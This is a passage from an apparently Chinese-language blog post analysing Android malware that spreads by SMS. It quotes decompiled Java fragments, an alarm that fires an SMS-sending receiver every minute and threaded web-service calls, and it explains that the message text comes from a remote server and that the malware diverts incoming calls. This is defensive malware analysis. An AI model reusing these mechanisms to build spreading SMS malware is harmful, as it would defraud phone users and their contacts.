PendingIntent.getBroadcast(paramContext, 0, new Intent(paramContext, SMSSender.class), 0);



  long l = SystemClock.elapsedRealtime();



  ((AlarmManager)paramContext.getSystemService("alarm")).setRepeating(2,
l, 60000L,
localPendingIntent);



}



另外看到所有的 Http GET 操作,都會再把 Http Response 的內容透過 Message 丟給注入的 Handler 做其他處理。



new Thread(new Runnable()



{



  public void run()



  {



    try



    {



      String str =
WebServiceCalling.this.callWS(paramString);



      if (paramHandler != null)



      {



        Message
localMessage = new Message();



        localMessage.what
= paramInt;



        localMessage.obj
= str;



        paramHandler.sendMessage(localMessage);



      }



      return;



    }



    catch (UnsupportedEncodingException
localUnsupportedEncodingException)



    {



      localUnsupportedEncodingException.printStackTrace();



      return;



    }



    catch (ParserConfigurationException
localParserConfigurationException)



    {



      localParserConfigurationException.printStackTrace();



    }



  }



}).start();



簡訊內容的來源是遠端server,所以應該可以很快地改變訊息發送的內容,也可以依據狀況改變要發送的連結內容。



另外,他還會監控你的來電,當有手機來電時,會將電話轉到 #,這是我不太理解的部分,不清楚轉號碼到這個 # 號會變怎麼樣,是會接掛斷電話?還是跟 USSD 漏洞有關係?



-----

以上就是病毒程式碼大致的狀況,雖然這個病毒還需要安裝執行才會有作用,不過對於一般人來說,應該比較難警覺到 App 有詐。因為一旦被感染後,病毒就可以直接存取聯絡人資料,所以傳播速度真是非常快,這些病毒的猖獗真是可怕。


























Posted by



at
















Labels:
,
,
,
,

















        

      









Subscribe to:
Posts (Atom)